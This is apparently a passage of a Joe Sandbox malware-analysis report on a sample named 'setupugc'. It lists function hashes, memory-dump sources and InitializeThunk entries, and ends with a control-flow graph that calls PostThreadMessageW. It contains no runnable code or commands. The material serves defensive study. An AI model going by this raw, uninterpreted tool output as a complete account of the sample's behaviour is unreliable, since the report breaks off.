                                            • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction Fuzzy Hash: BAE04F392107047BD620FA6ACC01F9B776CEBC5655F004415FA18AB240C671B91087A4
                                            Function 03BC4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ea5c6f404be8f79058d26f52dead04c28e7634a3d7ab42d7892970b4dbdd60fe
                                            • Instruction ID: e598ee8b405ce5894a8abf60f1ee8b5c7387ba662dd75e68cda80c20cab78f5b
                                            • Opcode Fuzzy Hash: ea5c6f404be8f79058d26f52dead04c28e7634a3d7ab42d7892970b4dbdd60fe
                                            • Instruction Fuzzy Hash: CD90023A605814129140B1584884546401597E0306B55C061E0428555C9B248A565361
                                            Function 03BC4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5d4037301c954ccf3697b96b967c00b30be5d4c2e3813c72ce406544ac7cf56b
                                            • Instruction ID: b34efaa1eeb09bf7dbc10d4b49c0634cb8250504fa9a6a010a1c89d97ed990bc
                                            • Opcode Fuzzy Hash: 5d4037301c954ccf3697b96b967c00b30be5d4c2e3813c72ce406544ac7cf56b
                                            • Instruction Fuzzy Hash: 7090026A601514424140B1584804406601597E1306395C165A0558561C972889559269
                                            Function 03BC2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b02575550215bfac4bcc81ea4f76e0d0151765a019e9181fe1da5adf8a4be43d
                                            • Instruction ID: 9dca172164914607577425e73d77a5d18b8ff9b3b579ee09097d255b7df2623d
                                            • Opcode Fuzzy Hash: b02575550215bfac4bcc81ea4f76e0d0151765a019e9181fe1da5adf8a4be43d
                                            • Instruction Fuzzy Hash: 1B90023A60541C02D150B1584414746001587D0306F55C061A0028655D97658B5576A1
                                            Function 03BC2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: af4d83887362650818f13504ef88335f69c89376c08dcde71a2d014a736ebf75
                                            • Instruction ID: 08ea2abe82ae9676b99459d70adbafc673fa8cf59074a1ee0686445891f02f61
                                            • Opcode Fuzzy Hash: af4d83887362650818f13504ef88335f69c89376c08dcde71a2d014a736ebf75
                                            • Instruction Fuzzy Hash: 6C90023A20141C02D180B158440464A001587D1306F95C065A0029655DDB258B5977A1
                                            Function 03BC2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1c351f6cc492e4efe4981bd7807f69aa40eaeca8189db25cdee509e5de7b87b0
                                            • Instruction ID: 883c1c900a912910d17bc5737a7e207ca76797e80848f83ac2a258fc59bdff60
                                            • Opcode Fuzzy Hash: 1c351f6cc492e4efe4981bd7807f69aa40eaeca8189db25cdee509e5de7b87b0
                                            • Instruction Fuzzy Hash: 7E90023A20545C42D140B1584404A46002587D030AF55C061A0068695DA7358E55B661
                                            Function 03BC2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ed890a10f6c98ec0b3a69343e98af04a0144ab0dc63eae09c9cb1d4d64953f74
                                            • Instruction ID: e3de349e5c60aca858be2e8876e03a71beaaa999d4712602864db16fa88ff773
                                            • Opcode Fuzzy Hash: ed890a10f6c98ec0b3a69343e98af04a0144ab0dc63eae09c9cb1d4d64953f74
                                            • Instruction Fuzzy Hash: 5A90026A202414034105B1584414616401A87E0206B55C071E1018591DD63589916125
                                            Function 03BC2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8018939ce26d581c4c79f0d95db2857ba76dcb296da01ed4394936c8748d6611
                                            • Instruction ID: 5bac22a336df86b58f0aaed56ad94866e2fe79256511fd867233bc446af3022e
                                            • Opcode Fuzzy Hash: 8018939ce26d581c4c79f0d95db2857ba76dcb296da01ed4394936c8748d6611
                                            • Instruction Fuzzy Hash: 4D90022E221414020145F558060450B045597D6356395C065F141A591CD73189655321
                                            Function 03BC2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9eeff0ca7a2b87c9cb99c0e82faf59a18d51a55098a870520f0ab300e69267eb
                                            • Instruction ID: ef85128836db369159c18bb74abb54ba9670678d04f1e3bf54ab47b326032212
                                            • Opcode Fuzzy Hash: 9eeff0ca7a2b87c9cb99c0e82faf59a18d51a55098a870520f0ab300e69267eb
                                            • Instruction Fuzzy Hash: 7D90043F311414030105F55C07045070057C7D5357355C071F101D551CF731CD715131
                                            Function 03BC2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4a0314eac5969e65fca8b36322f92dbc1b08a86f0c23bbdea55acccaac934bcf
                                            • Instruction ID: 6ae369f9b63fad1f538e4e147a8382e872534de9e3d634e73622e556fe704a72
                                            • Opcode Fuzzy Hash: 4a0314eac5969e65fca8b36322f92dbc1b08a86f0c23bbdea55acccaac934bcf
                                            • Instruction Fuzzy Hash: BD90022A601414424140B16888449064015ABE1216755C171A099C551D966989655665
                                            Function 03BC2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5e39ad733afbc33bd17952fdc8976ab4848e25a57a7aae2ab10d9fe972e5020a
                                            • Instruction ID: 42056aa71f64a300d4e41aba4b508b7369124d0964394070ab9009c6b2b85f2e
                                            • Opcode Fuzzy Hash: 5e39ad733afbc33bd17952fdc8976ab4848e25a57a7aae2ab10d9fe972e5020a
                                            • Instruction Fuzzy Hash: C190022A211C1442D200B5684C14B07001587D0307F55C165A0158555CDA2589615521
                                            Function 03BC2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e87057b4060ee8094acd1f0cc8b1dea870de8d38d7a7a7fbf46ceeff2e16edbb
                                            • Instruction ID: 25452b3166fcb1d561e68bdaf971d685e6c96705bd0b3419380c4320d64ce0a3
                                            • Opcode Fuzzy Hash: e87057b4060ee8094acd1f0cc8b1dea870de8d38d7a7a7fbf46ceeff2e16edbb
                                            • Instruction Fuzzy Hash: 7490026A34141842D100B1584414B060015C7E1306F55C065E1068555D9729CD526126
                                            Function 03BC2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3f4b657055d0310b2ad93f080b3196c19e1092a2aed911aff44be574f6bbf3fe
                                            • Instruction ID: 1a7adf2ce32fbf21fdba9e1b6ec4b0ee6d6c3204b5f37b44f07171bf56f9fe38
                                            • Opcode Fuzzy Hash: 3f4b657055d0310b2ad93f080b3196c19e1092a2aed911aff44be574f6bbf3fe
                                            • Instruction Fuzzy Hash: E790022A60141902D101B1584404616001A87D0246F95C072A1028556EDB358A92A131
                                            Function 03BC2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5b772aae63332fa68200afe5d8b88e7d3f797f5b358b7902e85a6427b490c67b
                                            • Instruction ID: 82257458b62a53d10763aae85eafa5e03fe8aa6f8e1e3de9d803ff58297e86bd
                                            • Opcode Fuzzy Hash: 5b772aae63332fa68200afe5d8b88e7d3f797f5b358b7902e85a6427b490c67b
                                            • Instruction Fuzzy Hash: 5D90026A20181803D140B5584804607001587D0307F55C061A2068556E9B398D516135
                                            Function 03BC2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a6ff53ee884fe68b785312c38e0a54b37f890f3ef71f22e9b5cccad6a8671064
                                            • Instruction ID: 56ac6f486745a03996a12f392b2e564d48a5113e3ce1844f228ff11bc68b0f26
                                            • Opcode Fuzzy Hash: a6ff53ee884fe68b785312c38e0a54b37f890f3ef71f22e9b5cccad6a8671064
                                            • Instruction Fuzzy Hash: 3090023A20141813D111B1584504707001987D0246F95C462A0428559DA7668A52A121
                                            Function 03BC2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4e0d43c4d2c86f2636d7ccda8851fd73a6177975fc292171d9fb2ed2b076eddc
                                            • Instruction ID: 1311a84fcc975e85b4437c046745d4aed2874eea449af20d1170cc3037e0716e
                                            • Opcode Fuzzy Hash: 4e0d43c4d2c86f2636d7ccda8851fd73a6177975fc292171d9fb2ed2b076eddc
                                            • Instruction Fuzzy Hash: EA90022A242455525545F1584404507401697E0246795C062A1418951C96369956D621
                                            Function 03BC2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f2db0db756411a530ea46597c9b9418570536909d3a5a1a3ddd0be870d57d269
                                            • Instruction ID: 844c3d8adfc6d4673b8bed97fe84ab92ccbc61ab4947b605e75e64a276217eac
                                            • Opcode Fuzzy Hash: f2db0db756411a530ea46597c9b9418570536909d3a5a1a3ddd0be870d57d269
                                            • Instruction Fuzzy Hash: A690022A30141403D140B15854186064015D7E1306F55D061E0418555CEA2589565222
                                            Function 03BC2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 05bd5a8a7a952dcee082ee23b7da70881a18be21fafcb0a1666f5f24b2486e97
                                            • Instruction ID: e661c7d3977a4b1fc4f3878cf7b95329c81dbe974e0a549306673b90a3807b2a
                                            • Opcode Fuzzy Hash: 05bd5a8a7a952dcee082ee23b7da70881a18be21fafcb0a1666f5f24b2486e97
                                            • Instruction Fuzzy Hash: 8290022E21341402D180B158540860A001587D1207F95D465A0019559CDA2589695321
                                            Function 03BC2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 73a0e1dba6890d09f98c4d6c92d68b9706dfc0c636e3638fe1b70794a463d817
                                            • Instruction ID: 95128509f0514e8568e0e6b9ffb37134376826950418f8d0faa4b3e3b78ca676
                                            • Opcode Fuzzy Hash: 73a0e1dba6890d09f98c4d6c92d68b9706dfc0c636e3638fe1b70794a463d817
                                            • Instruction Fuzzy Hash: EB90023A20141802D100B5985408646001587E0306F55D061A5028556ED77589916131
                                            Function 03BC2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6cc92a3f4d8d847076da18aed1ac077e034b7c2f24e868703d96e54fe3eb7749
                                            • Instruction ID: 621d49a432bcb66de293a4ba378f15fee4af614f75f13c7ec9ac7ff0655826ce
                                            • Opcode Fuzzy Hash: 6cc92a3f4d8d847076da18aed1ac077e034b7c2f24e868703d96e54fe3eb7749
                                            • Instruction Fuzzy Hash: A790023A20149C02D110B158840474A001587D0306F59C461A4428659D97A589917121
                                            Function 03BC2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3a473bf6d8dd8d80f3eb1206e8b4b45ddfa25b1212961dad2ba70bb1bafd2d3c
                                            • Instruction ID: 5c7e23ba016c3147731172ffec6f97f69fdda65448a199a6d40f9f9c0d960057
                                            • Opcode Fuzzy Hash: 3a473bf6d8dd8d80f3eb1206e8b4b45ddfa25b1212961dad2ba70bb1bafd2d3c
                                            • Instruction Fuzzy Hash: 1890023A20141C42D100B1584404B46001587E0306F55C066A0128655D9725C9517521
                                            Function 03BC35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7013332f23f02e9306fc396ca3e825e28fe09b655aeb101f4d769d43d1290d8a
                                            • Instruction ID: b8e03c5aaf3df270c84305a4b43925e924ecc30c564bc9e4c764319bdcbe5645
                                            • Opcode Fuzzy Hash: 7013332f23f02e9306fc396ca3e825e28fe09b655aeb101f4d769d43d1290d8a
                                            • Instruction Fuzzy Hash: 3190023A60551802D100B1584514706101587D0206F65C461A0428569D97A58A5165A2
                                            Function 03BC39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 768712f7fe6f4b7de1ece79fdef2740d228a5d54ebc3b8bab0cff3adc123a18d
                                            • Instruction ID: 2bc044e00988c1321a311383bb348fe70cbe55ee2fa1d72234b4f1ff5d1bd9d8
                                            • Opcode Fuzzy Hash: 768712f7fe6f4b7de1ece79fdef2740d228a5d54ebc3b8bab0cff3adc123a18d
                                            • Instruction Fuzzy Hash: 5C90022A24546502D150B15C44046164015A7E0206F55C071A0818595D966589556221
                                            Function 03260B6F Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 387 3260b6f-3260b78 388 3260bdf-3260bfc 387->388 389 3260b7a-3260b7d 387->389 392 3260c57-3260c5e 388->392 393 3260bfe-3260c05 388->393 390 3260b4f-3260b54 389->390 391 3260b7f-3260b8e 389->391 390->387 391->387 395 3260b90-3260bb6 391->395 394 3260c62 392->394 396 3260c07-3260c09 393->396 397 3260c7a-3260c7f 393->397 398 3260c64 394->398 399 3260ce1-3260d1f call 327b410 call 327be20 call 3264470 call 3251420 394->399 402 3260c1b 395->402 403 3260bb8-3260bdc 395->403 404 3260c0a-3260c11 396->404 400 3260c81-3260c9b 397->400 401 3260c9d-3260cae 397->401 398->404 406 3260c67-3260c78 398->406 407 3260d23-3260d4a call 3271b50 399->407 400->401 401->407 408 3260cb0-3260cb7 401->408 403->388 404->394 405 3260c13-3260c17 404->405 405->402 406->397 418 3260d4c-3260d5b PostThreadMessageW 407->418 419 3260d6a-3260d70 407->419 408->399 418->419 421 3260d5d-3260d67 418->421 421->419
                                            Strings
                                            Memory Dump Source
